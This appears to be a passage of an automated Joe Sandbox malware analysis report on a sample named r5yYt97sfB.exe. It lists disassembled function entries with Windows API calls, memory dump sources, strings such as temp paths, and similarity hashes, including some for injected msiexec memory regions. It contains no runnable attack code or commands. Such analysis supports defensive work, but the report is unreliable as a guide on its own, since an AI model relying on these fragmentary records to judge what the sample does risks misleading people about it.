                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                              • Opcode ID: 26223df348314c12187df1a3a086258d1616f78344ebc1c33a08eb5c9aa33e1f
                                                                                                                                              • Instruction ID: 2dd82fd711e3e4b5423ea32521429725dc25e45d8003ad5609f7a78d81fa071f
                                                                                                                                              • Opcode Fuzzy Hash: 26223df348314c12187df1a3a086258d1616f78344ebc1c33a08eb5c9aa33e1f
                                                                                                                                              • Instruction Fuzzy Hash: A7F0E172600504AFDB01DBE4DE88CEEBBBDEB48311B104476F541F51A1CA759D418B38
                                                                                                                                              APIs
                                                                                                                                              • GetDC.USER32(?), ref: 00401D59
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                              • CreateFontIndirectW.GDI32(0040CE00), ref: 00401DD1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3808545654-0
                                                                                                                                              • Opcode ID: 9d7988e3cd0506f91b59542dc0528f3f2e9c950226118d3629809f720825c0ab
                                                                                                                                              • Instruction ID: 540f35f5a36947b42322164f575acfe4ce77a432ba8ecb6b2d0148fd83f79f8e
                                                                                                                                              • Opcode Fuzzy Hash: 9d7988e3cd0506f91b59542dc0528f3f2e9c950226118d3629809f720825c0ab
                                                                                                                                              • Instruction Fuzzy Hash: EF01A231544640EFE7015BB0EF4EB9A3F74A7A5341F144579F941B62E2CAB801258BAD
                                                                                                                                              APIs
                                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                              • String ID: !
                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                              • Opcode ID: 11d4d904bb71dbb966a0ad9f723e74c8a428a9d9267570d3682b579917bfb7b7
                                                                                                                                              • Instruction ID: 8c23cbaaf3363c844559deeab64a920cb4d6fb7c8214554dffc13efcda3ce685
                                                                                                                                              • Opcode Fuzzy Hash: 11d4d904bb71dbb966a0ad9f723e74c8a428a9d9267570d3682b579917bfb7b7
                                                                                                                                              • Instruction Fuzzy Hash: FF219271940105BEEF01AFB4CE4AABE7B75EB44344F10403EF641B61D1D6B89A40D769
                                                                                                                                              APIs
                                                                                                                                              • CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,771B3420,?,771B2EE0,00405994,?,771B3420,771B2EE0,"C:\Users\user\Desktop\r5yYt97sfB.exe"), ref: 00405BF0
                                                                                                                                              • CharNextW.USER32(00000000), ref: 00405BF5
                                                                                                                                              • CharNextW.USER32(00000000), ref: 00405C0D
                                                                                                                                              Strings
                                                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405BE2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharNext
                                                                                                                                              • String ID: Error writing temporary file. Make sure your temp folder is valid.
                                                                                                                                              • API String ID: 3213498283-4064111799
                                                                                                                                              • Opcode ID: f220efeea37ee359dd6515a544f61222e30bb784142ca8a223f370c395045e43
                                                                                                                                              • Instruction ID: 8ad88def47e2d38867cf9e91343d20e41dbac1805b4d4da5c0653217526e5d7e
                                                                                                                                              • Opcode Fuzzy Hash: f220efeea37ee359dd6515a544f61222e30bb784142ca8a223f370c395045e43
                                                                                                                                              • Instruction Fuzzy Hash: 2FF06261918F1D56EB317A584C55A7756B8EB96350B04843BD741B71C0D3BC48818EE9
                                                                                                                                              APIs
                                                                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,004033A3,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 00405B3D
                                                                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,004033A3,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 00405B47
                                                                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405B59
                                                                                                                                              Strings
                                                                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405B37
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                                                              • API String ID: 2659869361-2382934351
                                                                                                                                              • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                                              • Instruction ID: 377234fc647d40db67a969affeec1c2d2c00c7240f2da489af686c3f2ce23dc9
                                                                                                                                              • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                                              • Instruction Fuzzy Hash: E1D05E711019246AC1117B448D04DDB63ACAE45300341046EF202B70A6C778695286FD
                                                                                                                                              APIs
                                                                                                                                              • CloseHandle.KERNEL32(000002A8,C:\Users\user~1\AppData\Local\Temp\,0040370C,?), ref: 004038EC
                                                                                                                                              • CloseHandle.KERNEL32(000002B8,C:\Users\user~1\AppData\Local\Temp\,0040370C,?), ref: 00403900
                                                                                                                                              Strings
                                                                                                                                              • C:\Users\user~1\AppData\Local\Temp\nss7012.tmp, xrefs: 00403910
                                                                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004038DF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandle
                                                                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nss7012.tmp
                                                                                                                                              • API String ID: 2962429428-122503355
                                                                                                                                              • Opcode ID: 818760232e500ac014ecc4659e20c47a416318d98e4cd696d1546b419abd0e17
                                                                                                                                              • Instruction ID: de49926bb72e77a98f9c5ce19ed8b4a608a10c25b77e0dec4f49a46a5066bf07
                                                                                                                                              • Opcode Fuzzy Hash: 818760232e500ac014ecc4659e20c47a416318d98e4cd696d1546b419abd0e17
                                                                                                                                              • Instruction Fuzzy Hash: E2E086B140071896C5246F7CAD4D9953A185F453357244326F078F60F0C7789A675A99
                                                                                                                                              APIs
                                                                                                                                              • IsWindowVisible.USER32(?), ref: 00405285
                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004052D6
                                                                                                                                                • Part of subcall function 00404293: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                              • Opcode ID: 56cab98530d4ff4408cd9c369303e271687e5fa7c90705031ed2c8dc290fa65f
                                                                                                                                              • Instruction ID: e2cad66c9b02384d3be1b0302d87088ec840166322e374313d6fbb5223fafa3d
                                                                                                                                              • Opcode Fuzzy Hash: 56cab98530d4ff4408cd9c369303e271687e5fa7c90705031ed2c8dc290fa65f
                                                                                                                                              • Instruction Fuzzy Hash: 5D01B1B1210709AFEF208F51DD80A6B3B35EF85361F10813BFA00761D1C77A9C529E29
                                                                                                                                              APIs
                                                                                                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\r5yYt97sfB.exe,C:\Users\user\Desktop\r5yYt97sfB.exe,80000000,00000003), ref: 00405B89
                                                                                                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\r5yYt97sfB.exe,C:\Users\user\Desktop\r5yYt97sfB.exe,80000000,00000003), ref: 00405B99
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharPrevlstrlen
                                                                                                                                              • String ID: C:\Users\user\Desktop
                                                                                                                                              • API String ID: 2709904686-3976562730
                                                                                                                                              • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                                              • Instruction ID: 9a844447357a9703a2937c3aa74ac44ffd17116a21dd7a3b54c6405c44ad0d39
                                                                                                                                              • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                                              • Instruction Fuzzy Hash: 86D05EB2401D209AD3226B08DC01D9F73ACEF1130174A486AE441A61A5D7787D808AA8
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CCD
                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CE5
                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF6
                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                              • Opcode ID: b8842b5e9385eef73c106f2d1b4b6860648d7e9ee05fc0ebd9cde526d115cc76
                                                                                                                                              • Instruction ID: b93a28ad29d67f10a2270253d02d4651c85e208682c2a56c3792b5f99d5f0f7a
                                                                                                                                              • Opcode Fuzzy Hash: b8842b5e9385eef73c106f2d1b4b6860648d7e9ee05fc0ebd9cde526d115cc76
                                                                                                                                              • Instruction Fuzzy Hash: 6FF0F631104958BFC7129FA5DD00A9FBBA8EF05350B2580BAE841F7220D674DE01AF68
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000B.00000002.3797587264.0000000002DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DCD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_11_2_2dcd000_msiexec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6c3c3b6bf56fa7dae630ff4171d4a7553f4902d8bdb6815e711fb6ab2a1f1e20
                                                                                                                                              • Instruction ID: 5172133f84bed72e3d4ad26754eb6e29016ba358736ab7fce153e1e91ec17ad7
                                                                                                                                              • Opcode Fuzzy Hash: 6c3c3b6bf56fa7dae630ff4171d4a7553f4902d8bdb6815e711fb6ab2a1f1e20
                                                                                                                                              • Instruction Fuzzy Hash: CA21D071604205AFDB14DF24D9C4B26BBA2EB88324F30C57DE8894B342C736D847DA62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000B.00000002.3797587264.0000000002DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DCD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_11_2_2dcd000_msiexec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 042b7a53897df0d98a36b3ac5a7cbf217c0cc246f36523dbbdb550e319fcf960
                                                                                                                                              • Instruction ID: 51f04eca1c701c93b0c79bd8f39b90a59fef90b91ebdb53ba493ba4d3c87680a
                                                                                                                                              • Opcode Fuzzy Hash: 042b7a53897df0d98a36b3ac5a7cbf217c0cc246f36523dbbdb550e319fcf960
                                                                                                                                              • Instruction Fuzzy Hash: 71117C755042449FCB15CF14D9C4B15BBA2FB44324F34C6ADE8494B756C33AD84ADB52
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000B.00000002.3798478811.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_11_2_2df0000_msiexec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6a2461ea7d5838baaa254e63e9edfd4b24951f620b9ae7f678417188ea049390
                                                                                                                                              • Instruction ID: c883970e8443ed89e2ed4b7f2b1b3ed1deb480730cd034ed1bb66488ccb0a9b2
                                                                                                                                              • Opcode Fuzzy Hash: 6a2461ea7d5838baaa254e63e9edfd4b24951f620b9ae7f678417188ea049390
                                                                                                                                              • Instruction Fuzzy Hash: B7C1B274E01218CFEB54DFA5C994B9DBBB2BF88300F2080A9D509AB355DB359E81CF54
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000B.00000002.3798478811.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_11_2_2df0000_msiexec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1e815f474f1aa3b80db78ae355cddf808553e9fd4904c2d675e9a1d188b240b4
                                                                                                                                              • Instruction ID: f09303214019aa1d891f8411e08dbe79c3fb2a25ec6d0ab5b4da5ca130da8187
                                                                                                                                              • Opcode Fuzzy Hash: 1e815f474f1aa3b80db78ae355cddf808553e9fd4904c2d675e9a1d188b240b4
                                                                                                                                              • Instruction Fuzzy Hash: B3511470D00209CFDB44EFA9C5887ADB7F2BB49304F158129C614AB794DB759C81CFA8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000B.00000002.3798478811.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_11_2_2df0000_msiexec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
